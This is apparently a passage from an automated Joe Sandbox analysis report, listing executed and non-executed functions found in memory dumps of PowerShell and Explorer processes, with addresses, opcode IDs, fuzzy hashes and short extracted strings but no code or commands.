                                                              Function 00007FFD341EE620 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.3854958156.00007FFD341ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd341ed000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AzSU
                                                              • API String ID: 0-3508381230
                                                              • Opcode ID: a88a8402e077f412a8a15a2b8c82fc283109bd94d63ec6523eb64cb93a655147
                                                              • Instruction ID: a0d37bd69e2d4da74a5cbacbe194057061f3d4ce690edc4ea2bbd2d0d6e94f3b
                                                              • Opcode Fuzzy Hash: a88a8402e077f412a8a15a2b8c82fc283109bd94d63ec6523eb64cb93a655147
                                                              • Instruction Fuzzy Hash: 9C41E67140DBC48FE7669B2998959523FF0EF57320F1905DFD088CB1A3D629A886C7A2
                                                              Function 00007FFD34309738 Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.3868723878.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd34300000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7122eb6a0f0f93b3f8b9875576360256adb397e4618e533562389e5c12396caa
                                                              • Instruction ID: 6a690d0213ad9f304488252113b5f5da75867411b033c3ab2b05ed4b1e7dfeca
                                                              • Opcode Fuzzy Hash: 7122eb6a0f0f93b3f8b9875576360256adb397e4618e533562389e5c12396caa
                                                              • Instruction Fuzzy Hash: 1B412B72A0DF884FDB58AF5C9C562A97BE0FF56310F04426FE449C3192DA34A815CBC6
                                                              Function 00007FFD3430A74C Relevance: .1, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.3868723878.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd34300000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24eddd1c612840327d1d1b23bfcb9c29063897da2ce8fad7a09e6058b0698352
                                                              • Instruction ID: dd16bc97b30d18ad10200c6440b40f5b44e60c0ab8551afd86a759ef932df700
                                                              • Opcode Fuzzy Hash: 24eddd1c612840327d1d1b23bfcb9c29063897da2ce8fad7a09e6058b0698352
                                                              • Instruction Fuzzy Hash: 1831F83190DB884FDB59DBAC98996E97FE0EB66321F0481AFC089C7153D578580ACB52
                                                              Function 00007FFD343033B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.3868723878.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd34300000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction ID: bc5efc961e5abd7dcb89c1967d5c4fdaf3f83d74804c9b914f9453b986734488
                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction Fuzzy Hash: 3201677125CB0C4FD754EF0CE491AA9B7E0FB99364F10056DE58AC3661DA36E882CB46
                                                              Function 00007FFD3430BE98 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.3868723878.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd34300000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 833b36e5ac0400503f9dda138b9b0031255c2190ea0a18dc5e69f4cd369d6f2b
                                                              • Instruction ID: d21966465e1fe5540f57ef2ec1995cc1d308a71abf02e55a9b3108128562693c
                                                              • Opcode Fuzzy Hash: 833b36e5ac0400503f9dda138b9b0031255c2190ea0a18dc5e69f4cd369d6f2b
                                                              • Instruction Fuzzy Hash: D2F0A03275C6088FDB5CAA0CF8529B573E0EB89320B10027EE48BC3292D927E842C681
                                                              Function 00007FFD34309CF8 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.3868723878.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd34300000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 287a838fc362cbd593e99451a060cca3a9767764a86924a20171985515dfb80f
                                                              • Instruction ID: 6af3a283cf4044d9145d0bc8aaf42a8eb080d273f644cb46812c551d84d70860
                                                              • Opcode Fuzzy Hash: 287a838fc362cbd593e99451a060cca3a9767764a86924a20171985515dfb80f
                                                              • Instruction Fuzzy Hash: D5F024318486894FDB06EF2888695D57FA0EF27310F05029BE449C70A2DB759458CB82

                                                              Non-executed Functions

                                                              Function 00007FFD343084F2 Relevance: 11.5, Strings: 9, Instructions: 286COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.3868723878.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd34300000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L_^$L_^$L_^$L_^$L_^$L_^$L_^$L_^$L_^
                                                              • API String ID: 0-1387542222
                                                              • Opcode ID: f8618793eaa4742f5f2fcc8af9988fe9f276e003766d51be441f9a285eec7193
                                                              • Instruction ID: 910a7e3596256a870e83337b12a88a1ef232a2feed24c499bcb607923a446466
                                                              • Opcode Fuzzy Hash: f8618793eaa4742f5f2fcc8af9988fe9f276e003766d51be441f9a285eec7193
                                                              • Instruction Fuzzy Hash: 16910553E4D6C61BE766572918B60DA3FD4EF53224B0E11F6C7C9C7083EE2D680BA212
                                                              Function 00007FFD34308BD3 Relevance: 7.6, Strings: 6, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.3868723878.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd34300000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L_^?$L_^@$L_^K$L_^N$L_^T$L_^Y
                                                              • API String ID: 0-2042962386
                                                              • Opcode ID: 88fcb883f04dd7d002b713efc7734b1aeeda42f33504c28720064b2b695c23b2
                                                              • Instruction ID: f016ce71ca756f27051b6cca04b94689c46643aa67e90e1967971982eba83247
                                                              • Opcode Fuzzy Hash: 88fcb883f04dd7d002b713efc7734b1aeeda42f33504c28720064b2b695c23b2
                                                              • Instruction Fuzzy Hash: 8A21FD637088260AC32236EDB8129ED7768DF9527534452B2E268DA153DE24A0CB86D1

                                                              Executed Functions

                                                              Function 00007FFD343C6630 Relevance: 7.9, Strings: 6, Instructions: 417COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3789558267.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (Ba4$(Ba4$(Ba4$(Ba4$(Ba4$X7]q
                                                              • API String ID: 0-4232180842
                                                              • Opcode ID: 5694a174ce6878c8089634dd04927593ce8365d57c6b87f1e3d9240627b4dd7a
                                                              • Instruction ID: 889952b584e5a69a6dc97fbd79780cf11693895d32aa4f90cdae0876126522fa
                                                              • Opcode Fuzzy Hash: 5694a174ce6878c8089634dd04927593ce8365d57c6b87f1e3d9240627b4dd7a
                                                              • Instruction Fuzzy Hash: C2D13472B8DB894FEBA5BB6848A55B97BD1EF56310F0801BED14DCB0A3D92DAC05C341
                                                              Function 00007FFD342FA441 Relevance: .2, Instructions: 209COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3775028949.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3c651af784de328cd5380dc59871601d646718f6ade4dce5eee336542f0768e
                                                              • Instruction ID: c4cf39d6716835b49ee9f7562bbb64ed8d58ba97919d69952e3913ef840bc606
                                                              • Opcode Fuzzy Hash: b3c651af784de328cd5380dc59871601d646718f6ade4dce5eee336542f0768e
                                                              • Instruction Fuzzy Hash: 91517B31A0CA894FD759DB6C984A7F57BE0EF57331F0442AFC059C31A2CE696806C791
                                                              Function 00007FFD342F9748 Relevance: .1, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3775028949.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8a8375b888034a8112d68523687f9950501d471dd274ec53e9b7fa1d82308b54
                                                              • Instruction ID: 2dfa3de6eee7c1a38bb4427654e275d8150a9789cd77c493b581b80791f2c7e1
                                                              • Opcode Fuzzy Hash: 8a8375b888034a8112d68523687f9950501d471dd274ec53e9b7fa1d82308b54
                                                              • Instruction Fuzzy Hash: 5D412C72A0DF888FDB589F1C9C566A87BE0FF56310F04426FD449D3252DA35A815CBC6
                                                              Function 00007FFD341DE380 Relevance: .1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3755943296.00007FFD341DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd341dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f839fe62f41fb2a1dfe0c617c93b832ff47437b9f62a4aac50dea675ed7d4740
                                                              • Instruction ID: 19b292c3de74e778004da3002f89b5ec51a5a2611bbc3b07a0b0f3bc395e6531
                                                              • Opcode Fuzzy Hash: f839fe62f41fb2a1dfe0c617c93b832ff47437b9f62a4aac50dea675ed7d4740
                                                              • Instruction Fuzzy Hash: 904125B180EFC45FD7568B2998919623FB0EF53325B1505EFD088CB1A3D629E806C792
                                                              Function 00007FFD342F33B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3775028949.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f665162688d7470f6ef13af6ad285bfc79c232eac86bd9fb7ef00a49a4bd0286
                                                              • Instruction ID: d76700d8120413915679eb5528f3a1d245f28cc21299573542b580b01c5a2b0a
                                                              • Opcode Fuzzy Hash: f665162688d7470f6ef13af6ad285bfc79c232eac86bd9fb7ef00a49a4bd0286
                                                              • Instruction Fuzzy Hash: 3F01677121CB0C8FD754EF0CE451AA5B7E0FB99364F50056DE58AC3661DA36E882CB45
                                                              Function 00007FFD342F9CF8 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3775028949.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0ae5eb6bfe9b2035507dded81a8023e473fd73fe2752c4ceeaf1d9d61efb9e44
                                                              • Instruction ID: e52ebfb15d5328e62513669527a90f7137b9e674f4d496fe8015b56371103214
                                                              • Opcode Fuzzy Hash: 0ae5eb6bfe9b2035507dded81a8023e473fd73fe2752c4ceeaf1d9d61efb9e44
                                                              • Instruction Fuzzy Hash: 06F0BB358086898FEB46EF2888595E57FA0EF17310F150297D458C70A2DB659558CF92
                                                              Function 00007FFD343C414D Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3789558267.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction ID: 4f891ce5be974d1c8e76aeecf66fc7e693b7f92fbc2f1447b9f64d71c7487220
                                                              • Opcode Fuzzy Hash: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction Fuzzy Hash: D5F05432B4C9554FD765FB4CE45149873E5EF6532071600B6E16DC7563CA39EC41C744
                                                              Function 00007FFD343C4400 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3789558267.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction ID: 0867862a54e442d3eb058707641e8607b0ce4af0ba291441b5c441847efd4f98
                                                              • Opcode Fuzzy Hash: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction Fuzzy Hash: 82F05E32B4C9458FDB54EB4CE4914A877E0EF5632476600B6E15EC7563DA29EC40C750
                                                              Function 00007FFD343C41D1 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3789558267.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction ID: c8224e7659732bfc08a244a07766d2e50e2587e028fc07878611f3a88b565ce1
                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction Fuzzy Hash: 64E0483274C8148FD668EA0CE1909E973E1EFA933171101B7D25FC7561C635EC51DB80
                                                              Function 00007FFD342F6220 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3775028949.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e30b93e361296d4c546a896d46de40cbfadedcf7791d1defb9350ca8ad77b29a
                                                              • Instruction ID: ca2a2b10eceadf6e1c624586a035381d8fb419d8522ca853224e7923518ce6a0
                                                              • Opcode Fuzzy Hash: e30b93e361296d4c546a896d46de40cbfadedcf7791d1defb9350ca8ad77b29a
                                                              • Instruction Fuzzy Hash: 6FE08C35810A0C8F8B44EF18D8099EA77E0FF28305B00025BF80ED3120DB31AA58CFC2

                                                              Non-executed Functions

                                                              Function 00007FFD342F84E3 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3775028949.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                              • API String ID: 0-2396788759
                                                              • Opcode ID: 235b4d3294776a55c36f3c72fceaffc6529f06a5642cd07340617ca6a14ec3db
                                                              • Instruction ID: 45afa9e03b8234e3954aa7081173b21cb547b7bba7a1e898bf6f01be6336e56d
                                                              • Opcode Fuzzy Hash: 235b4d3294776a55c36f3c72fceaffc6529f06a5642cd07340617ca6a14ec3db
                                                              • Instruction Fuzzy Hash: 86318057E0E6C29BE353023818B60D9BFD4AE5326474F01F6C6D8DB093EF1D6817A242

                                                              Executed Functions

                                                              Function 00007FFD343C6605 Relevance: 6.7, Strings: 5, Instructions: 441COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3839022723.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (Ba4$(Ba4$(Ba4$(Ba4$(Ba4
                                                              • API String ID: 0-989513462
                                                              • Opcode ID: fdd9734d14628ec9d97785a72f926f6ec496e6ca309cc25d2dd8a5a80539e580
                                                              • Instruction ID: 4b88994b295f96de1ebc214fd774206f0de28cd96cbda92062bc8bbcdc53f726
                                                              • Opcode Fuzzy Hash: fdd9734d14628ec9d97785a72f926f6ec496e6ca309cc25d2dd8a5a80539e580
                                                              • Instruction Fuzzy Hash: B6D12432B8EB894FEBA5EB6848A55B57BD1EF56310B0905FED14DCB0A3D928AC05C341
                                                              Function 00007FFD342FB258 Relevance: .4, Instructions: 362COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3825852581.00007FFD342F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F5000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd342f5000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38e3eaf7f38ee7e8875b65f0b6069310abd4585f0b053c4f38bb342febcdbca9
                                                              • Instruction ID: e66ff7c8e943d2fb8f6abd2568b0088d284d998a4baa8817ba2e3f21778b9c15
                                                              • Opcode Fuzzy Hash: 38e3eaf7f38ee7e8875b65f0b6069310abd4585f0b053c4f38bb342febcdbca9
                                                              • Instruction Fuzzy Hash: B7B15C7161CB498FD758DF18C4A56B5BBE1EF96310F10017EE18AC31A3DA26F846CB41
                                                              Function 00007FFD342F9748 Relevance: .1, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3825852581.00007FFD342F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F5000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd342f5000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c4d349192ac34e629d02a12a54512d19d55fbbc71b91b0761db233ddf98ce9b
                                                              • Instruction ID: 15d2dbf3b565196dae6675027d52b90efa0a73305b1a1a9ac0f26e311d07e973
                                                              • Opcode Fuzzy Hash: 1c4d349192ac34e629d02a12a54512d19d55fbbc71b91b0761db233ddf98ce9b
                                                              • Instruction Fuzzy Hash: 2D414C72A0DF888FDB589F1C9C566A87BE0FF56310F04426FD448D3252DA35A815CBC6
                                                              Function 00007FFD341DE380 Relevance: .1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3812957875.00007FFD341DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd341dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d953fdf40e7356b1c9f14b643100dcbac33ab905a3a8664152804a3ef4f518ac
                                                              • Instruction ID: 566ead4cdff3a5c8842428b4b8b99e8df8ad226fc23cff3665fc84fa0660faac
                                                              • Opcode Fuzzy Hash: d953fdf40e7356b1c9f14b643100dcbac33ab905a3a8664152804a3ef4f518ac
                                                              • Instruction Fuzzy Hash: 8F4158B180EFC44FD7568B2998919623FF0EF53321B1505EFD08CCB1A3D629A80AC792
                                                              Function 00007FFD342F33B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3825852581.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                              • Instruction ID: d76700d8120413915679eb5528f3a1d245f28cc21299573542b580b01c5a2b0a
                                                              • Opcode Fuzzy Hash: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                              • Instruction Fuzzy Hash: 3F01677121CB0C8FD754EF0CE451AA5B7E0FB99364F50056DE58AC3661DA36E882CB45
                                                              Function 00007FFD342F9CF8 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3825852581.00007FFD342F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F5000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd342f5000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30eefaf1e0fff6a1874eeb76fd98b11d138496b995a10f528edfc85d12de1015
                                                              • Instruction ID: e52ebfb15d5328e62513669527a90f7137b9e674f4d496fe8015b56371103214
                                                              • Opcode Fuzzy Hash: 30eefaf1e0fff6a1874eeb76fd98b11d138496b995a10f528edfc85d12de1015
                                                              • Instruction Fuzzy Hash: 06F0BB358086898FEB46EF2888595E57FA0EF17310F150297D458C70A2DB659558CF92
                                                              Function 00007FFD343C414D Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3839022723.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction ID: 4f891ce5be974d1c8e76aeecf66fc7e693b7f92fbc2f1447b9f64d71c7487220
                                                              • Opcode Fuzzy Hash: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction Fuzzy Hash: D5F05432B4C9554FD765FB4CE45149873E5EF6532071600B6E16DC7563CA39EC41C744
                                                              Function 00007FFD343C4400 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3839022723.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction ID: 0867862a54e442d3eb058707641e8607b0ce4af0ba291441b5c441847efd4f98
                                                              • Opcode Fuzzy Hash: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction Fuzzy Hash: 82F05E32B4C9458FDB54EB4CE4914A877E0EF5632476600B6E15EC7563DA29EC40C750
                                                              Function 00007FFD343C41D1 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3839022723.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction ID: c8224e7659732bfc08a244a07766d2e50e2587e028fc07878611f3a88b565ce1
                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction Fuzzy Hash: 64E0483274C8148FD668EA0CE1909E973E1EFA933171101B7D25FC7561C635EC51DB80

                                                              Non-executed Functions

                                                              Function 00007FFD342F84E3 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.3825852581.00007FFD342F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F5000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd342f5000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                              • API String ID: 0-2396788759
                                                              • Opcode ID: 86075c323d20ed6fb0fbf188bb21bd6367995c640bac2f1d1fc3faee21a20ce1
                                                              • Instruction ID: 45afa9e03b8234e3954aa7081173b21cb547b7bba7a1e898bf6f01be6336e56d
                                                              • Opcode Fuzzy Hash: 86075c323d20ed6fb0fbf188bb21bd6367995c640bac2f1d1fc3faee21a20ce1
                                                              • Instruction Fuzzy Hash: 86318057E0E6C29BE353023818B60D9BFD4AE5326474F01F6C6D8DB093EF1D6817A242

                                                              Executed Functions

                                                              Function 00007FFD342E0A19 Relevance: .3, Instructions: 283COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d833123dfb120368c8058563b01850a1c597883a79d818676ab590a1116023a
                                                              • Instruction ID: 6a2b2fbde06d2f463f12494cd220dc3f55664b4f461f6c2ddeb66a752c415358
                                                              • Opcode Fuzzy Hash: 6d833123dfb120368c8058563b01850a1c597883a79d818676ab590a1116023a
                                                              • Instruction Fuzzy Hash: BA71581AB1CA5A0AE768663C18E53BA76C2EF8A710F29123DD1DFC32C3DC1D6C476241
                                                              Function 00007FFD342E1A0D Relevance: .2, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.3587727674.00007FFD342E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd342e0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
